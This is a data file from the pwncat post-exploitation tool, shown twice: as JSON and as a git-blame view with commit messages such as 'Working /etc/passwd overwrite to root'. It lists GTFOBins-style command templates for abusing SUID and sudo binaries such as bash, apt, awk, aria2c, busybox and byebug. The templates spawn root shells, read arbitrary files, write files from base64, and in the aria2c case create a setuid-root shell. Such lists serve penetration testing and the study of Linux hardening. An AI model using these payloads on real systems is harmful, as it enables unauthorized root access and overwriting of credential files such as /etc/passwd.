pwncat/data/gtfobins.json

[
	{
		"name": "cat",
		"read_file": "{path} {lfile}"
	},
	{
		"name": "bash",
		"shell": {
			"script": "{command}", 
			"suid": ["-p"]
		},
		"read_file": "{path} -p -c \"cat {lfile}\"",
		"write_file": {
			"type": "base64",
			"payload": "{path} -p -c \"echo -n {data} | base64 -d > {lfile}\""
		},
		"command": "{path} -p -c {command}"
	},
	{
		"name": "apt-get",
		"shell": {
			"need": ["changelog", "apt"],
			"input": "!{shell}\n",
			"exit": "exit\nq\n"
		}
	},
	{
		"name": "apt",
		"shell": {
			"need": ["changelog", "apt"],
			"input": "!{shell}\n",
			"exit": "exit\nq\n"
		}
	},
	{
		"name": "aria2c",
		"shell": {
			"script": "TF=$(mktemp); SHELL=$(mktemp); cp {shell} $SHELL; echo \"chown root:root $SHELL; chmod +sx $SHELL;\" > $TF;chmod +x $TF; {command}; sleep 1; $SHELL -p",
			"need": ["--on-download-error=$TF","http://x"]
		}
	},
	{
		"name": "ash",
		"shell": {
			"script": "{command}", 
			"suid": ["-p"]
		},
		"read_file": "{path} -p -c \"cat {lfile}\"",
		"write_file": {
			"type": "base64",
			"payload": "{path} -p -c \"echo -n {data} | base64 -d > {lfile}\""
		},
		"command": "{path} -p -c {command}"
	},
	{
		"name": "awk",
		"shell": {
			"script": "{command} 'BEGIN {{system(\"{shell} -p\")}}'"
		},
		"read_file": "{path} '//' {lfile}",
		"write_file": {
			"type": "base64",
			"payload": "{path} -v LFILE={lfile} 'BEGIN {{ printf \"\" > LFILE; while ((\"echo \\\"{data}\\\" | base64 -d\" | getline) > 0){{ print >> LFILE }} }}'"
		}
	},
	{
		"name": "gawk",
		"shell": {
			"script": "{command} 'BEGIN {{system(\"{shell}\")}}'"
		},
		"read_file": "{path} '//' {lfile}",
		"write_file": {
			"type": "base64",
			"payload": "{path} -v LFILE={lfile} 'BEGIN {{ printf \"\" > LFILE; while ((\"echo \\\"{data}\\\" | base64 -d\" | getline) > 0){{ print >> LFILE }} }}'"
		}
	},
	{
		"name": "base32",
		"read_file": "{path} {lfile} | {path} -d"
	},
	{
		"name": "base64",
		"read_file": "{path} {lfile} | {path} -d"
	},
	{
		"name": "bpftrace",
		"shell": {
			"script": "{command} -c {shell} -e 'END {{exit()}}'", 
			"suid": ["-p"]
		}
	},
	{
		"name": "bundler",
		"shell": {
			"script": "{command} help",
			"input": "!{shell}\n",
			"exit": "exit\nq\n"
		}
	},
	{
		"name": "busctl",
		"shell": {
			"script": "{command}",
			"input": "!{shell}\n",
			"exit": "exit\nq\n"
		}
	},
	{
		"name": "busybox",
		"shell": {
			"script": "{command} sh"
		},
		"read_file": "{path} -c \"cat {lfile}\"",
		"write_file": {
			"type": "base64",
			"payload": "{path} -c \"echo -n {data} | base64 -d > {lfile}\""
		}
	},
	{
		"name": "byebug",
		"shell": {
			"script": "TF=$(mktemp);echo 'system(\"{shell}\")' > $TF;{command}  --no-stop -q $TF",
			"need": [
				"--no-stop",
				"-q"
			]
		},
		"read_file": "TF=$(mktemp);echo 'system(\"cat {lfile}\")' > $TF;{command}  --no-stop -q $TF",
		"write_file": {
			"type": "base64",
			"payload": "TF=$(mktemp);echo 'system(\"echo {data} | base64 -d > {lfile}\")' > $TF;{path} --no-stop -q $TF"
		}
	},
	{
		"name": "dash",
		"shell": {
			"script": "{command}", 
			"suid": ["-p"]
		},
		"read_file": "{path} -p -c \"cat {lfile}\"",
		"write_file": {
			"type": "base64",
			"payload": "{path} -p -c \"echo -n {data} | base64 -d > {lfile}\""
		},
		"command": "{path} -p -c {command}"
	}
]
Added abstract gtfobins interface 2020-05-09 06:49:38 +02:00			`[`
Working /etc/passwd overwrite to root. 2020-05-10 03:38:24 +02:00			`{`
			`"name": "cat",`
			`"read_file": "{path} {lfile}"`
			`},`
Added abstract gtfobins interface 2020-05-09 06:49:38 +02:00			`{`
			`"name": "bash",`
Added sudo awareness to gtfobins and updated privesc/sudo to understand the new interface. Sudo now supports wildcard listings and can intelligently parse whether a privesc is possible. 2020-05-09 21:02:04 +02:00			`"shell": {`
			`"script": "{command}",`
			`"suid": ["-p"]`
			`},`
Added abstract gtfobins interface 2020-05-09 06:49:38 +02:00			`"read_file": "{path} -p -c \"cat {lfile}\"",`
			`"write_file": {`
			`"type": "base64",`
			`"payload": "{path} -p -c \"echo -n {data} \| base64 -d > {lfile}\""`
			`},`
			`"command": "{path} -p -c {command}"`
Added lots of dirty sudo privesc code. It works! 2020-05-09 09:28:58 +02:00			`},`
			`{`
			`"name": "apt-get",`
			`"shell": {`
Added sudo awareness to gtfobins and updated privesc/sudo to understand the new interface. Sudo now supports wildcard listings and can intelligently parse whether a privesc is possible. 2020-05-09 21:02:04 +02:00			`"need": ["changelog", "apt"],`
Added lots of dirty sudo privesc code. It works! 2020-05-09 09:28:58 +02:00			`"input": "!{shell}\n",`
			`"exit": "exit\nq\n"`
			`}`
			`},`
			`{`
			`"name": "apt",`
			`"shell": {`
Added sudo awareness to gtfobins and updated privesc/sudo to understand the new interface. Sudo now supports wildcard listings and can intelligently parse whether a privesc is possible. 2020-05-09 21:02:04 +02:00			`"need": ["changelog", "apt"],`
Added lots of dirty sudo privesc code. It works! 2020-05-09 09:28:58 +02:00			`"input": "!{shell}\n",`
			`"exit": "exit\nq\n"`
			`}`
			`},`
			`{`
			`"name": "aria2c",`
Added sudo awareness to gtfobins and updated privesc/sudo to understand the new interface. Sudo now supports wildcard listings and can intelligently parse whether a privesc is possible. 2020-05-09 21:02:04 +02:00			`"shell": {`
			`"script": "TF=$(mktemp); SHELL=$(mktemp); cp {shell} $SHELL; echo \"chown root:root $SHELL; chmod +sx $SHELL;\" > $TF;chmod +x $TF; {command}; sleep 1; $SHELL -p",`
			`"need": ["--on-download-error=$TF","http://x"]`
			`}`
Added privesc read capability! Only somewhat tested... 2020-05-09 23:05:18 +02:00			`},`
Added "safe" property to gtfobins and started to add more GTFObins 2020-05-10 00:36:51 +02:00			`{`
			`"name": "ash",`
			`"shell": {`
			`"script": "{command}",`
			`"suid": ["-p"]`
			`},`
			`"read_file": "{path} -p -c \"cat {lfile}\"",`
			`"write_file": {`
			`"type": "base64",`
			`"payload": "{path} -p -c \"echo -n {data} \| base64 -d > {lfile}\""`
			`},`
			`"command": "{path} -p -c {command}"`
			`},`
Added new GTFObins entries 2020-05-10 01:00:15 +02:00			`{`
			`"name": "awk",`
			`"shell": {`
Working /etc/passwd overwrite to root. 2020-05-10 03:38:24 +02:00			`"script": "{command} 'BEGIN {{system(\"{shell} -p\")}}'"`
Added new GTFObins entries 2020-05-10 01:00:15 +02:00			`},`
			`"read_file": "{path} '//' {lfile}",`
			`"write_file": {`
			`"type": "base64",`
Working /etc/passwd overwrite to root. 2020-05-10 03:38:24 +02:00			`"payload": "{path} -v LFILE={lfile} 'BEGIN {{ printf \"\" > LFILE; while ((\"echo \\\"{data}\\\" \| base64 -d\" \| getline) > 0){{ print >> LFILE }} }}'"`
Added new GTFObins entries 2020-05-10 01:00:15 +02:00			`}`
			`},`
			`{`
			`"name": "gawk",`
			`"shell": {`
Added more gtfobins! 2020-05-10 03:40:37 +02:00			`"script": "{command} 'BEGIN {{system(\"{shell}\")}}'"`
Added new GTFObins entries 2020-05-10 01:00:15 +02:00			`},`
			`"read_file": "{path} '//' {lfile}",`
			`"write_file": {`
			`"type": "base64",`
Working /etc/passwd overwrite to root. 2020-05-10 03:38:24 +02:00			`"payload": "{path} -v LFILE={lfile} 'BEGIN {{ printf \"\" > LFILE; while ((\"echo \\\"{data}\\\" \| base64 -d\" \| getline) > 0){{ print >> LFILE }} }}'"`
Added new GTFObins entries 2020-05-10 01:00:15 +02:00			`}`
			`},`
Added more gtfobins! 2020-05-10 03:40:37 +02:00			`{`
			`"name": "base32",`
			`"read_file": "{path} {lfile} \| {path} -d"`
			`},`
			`{`
			`"name": "base64",`
			`"read_file": "{path} {lfile} \| {path} -d"`
			`},`
			`{`
			`"name": "bpftrace",`
			`"shell": {`
Fixed errata from merge 2020-05-10 04:06:45 +02:00			`"script": "{command} -c {shell} -e 'END {{exit()}}'",`
Added more gtfobins! 2020-05-10 03:40:37 +02:00			`"suid": ["-p"]`
			`}`
			`},`
			`{`
			`"name": "bundler",`
			`"shell": {`
			`"script": "{command} help",`
			`"input": "!{shell}\n",`
			`"exit": "exit\nq\n"`
			`}`
			`},`
			`{`
			`"name": "busctl",`
			`"shell": {`
			`"script": "{command}",`
			`"input": "!{shell}\n",`
			`"exit": "exit\nq\n"`
			`}`
			`},`
			`{`
			`"name": "busybox",`
			`"shell": {`
			`"script": "{command} sh"`
			`},`
			`"read_file": "{path} -c \"cat {lfile}\"",`
			`"write_file": {`
			`"type": "base64",`
			`"payload": "{path} -c \"echo -n {data} \| base64 -d > {lfile}\""`
			`}`
			`},`
			`{`
			`"name": "byebug",`
			`"shell": {`
Fixed errata from merge 2020-05-10 04:06:45 +02:00			`"script": "TF=$(mktemp);echo 'system(\"{shell}\")' > $TF;{command} --no-stop -q $TF",`
			`"need": [`
			`"--no-stop",`
			`"-q"`
			`]`
Added more gtfobins! 2020-05-10 03:40:37 +02:00			`},`
Fixed errata from merge 2020-05-10 04:06:45 +02:00			`"read_file": "TF=$(mktemp);echo 'system(\"cat {lfile}\")' > $TF;{command} --no-stop -q $TF",`
Added more gtfobins! 2020-05-10 03:40:37 +02:00			`"write_file": {`
			`"type": "base64",`
Fixed errata from merge 2020-05-10 04:06:45 +02:00			`"payload": "TF=$(mktemp);echo 'system(\"echo {data} \| base64 -d > {lfile}\")' > $TF;{path} --no-stop -q $TF"`
Added more gtfobins! 2020-05-10 03:40:37 +02:00			`}`
			`},`
Added "safe" property to gtfobins and started to add more GTFObins 2020-05-10 00:36:51 +02:00			`{`
			`"name": "dash",`
			`"shell": {`
			`"script": "{command}",`
			`"suid": ["-p"]`
			`},`
			`"read_file": "{path} -p -c \"cat {lfile}\"",`
			`"write_file": {`
			`"type": "base64",`
			`"payload": "{path} -p -c \"echo -n {data} \| base64 -d > {lfile}\""`
			`},`
			`"command": "{path} -p -c {command}"`
Added abstract gtfobins interface 2020-05-09 06:49:38 +02:00			`}`
			`]`